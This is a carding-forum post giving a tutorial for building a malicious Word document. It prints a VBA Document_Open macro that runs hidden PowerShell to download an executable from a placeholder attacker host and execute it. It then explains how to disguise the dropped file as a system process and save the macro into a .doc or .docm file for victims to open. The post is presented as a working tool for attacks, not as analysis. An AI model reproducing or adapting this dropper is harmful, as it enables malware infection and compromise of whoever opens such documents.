Go Back   Carder.life > [en] International Forum > Hacking & Coding
Reload this Page Creating an undetectable .DOC macro exploit (2019)

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 01-01-2025, 01:49 PM
quickly's Avatar

quickly quickly is offline
Join Date: Dec 2022
Posts: 1
Default

This exploit will effect any machine using any version of word that has macros enabled. Examples are as follows: 2003, 2007, 2010, 2013, 2016, 365
Example Code:
Private Sub Document_Open() Shell ("cmd.exe /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://YourWebsite.com/YourStub.exe','%Appdata%\DroppedStub');&start %Appdata%\DroppedStub& exit") End Sub
In the first step we will be modifying the code above to make it execute your payload file. The first part you will need to alter is “http://YourWebsite.com/YourStub.exe“. You will be replacing this with the direct download link to your executable file. The next part will be “%Appdata%\DroppedStub” which the process/file name of your executable after it executes. For example you could name this “winapi“, “winservhost” or whatever you like. In this example we are using the appdata folder for dropping the file. This does not require administrative privileges and to maximize compatibility. Another alternative would be to use “%temp%“. You will need to change the name of droppedstub in two locations within the example code. Pay close attention to this.
In final stage of this exploit we will be creating the document. You will require any versions of microsoft word that has macros enabled. Once you have, launch word and create a new document. Head over to the view tab, click on macros and here you will find “View Macros“. Click on Create Macro and navigate to the “Project Explorer” tab on your left hand side. Click on your document, by default Project (Document1) and expand it to click on “Microsoft Word Objects“. Double click on “ThisDocument” here you will copy and paste the modified code you created in step 1. Now click Ctrl + S or save it, then close the entire Macro Editor / VBA Explorer window.
When a window pops up saying “The following project cannot be saved in a macro-free document” just simply click no and select any extension of your choice to save the document. Our team suggests using .doc or .docm.
Happy hacking!
 

Tags
NULL

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 07:48 AM.

Contact Us - Carder.life - Archive - Top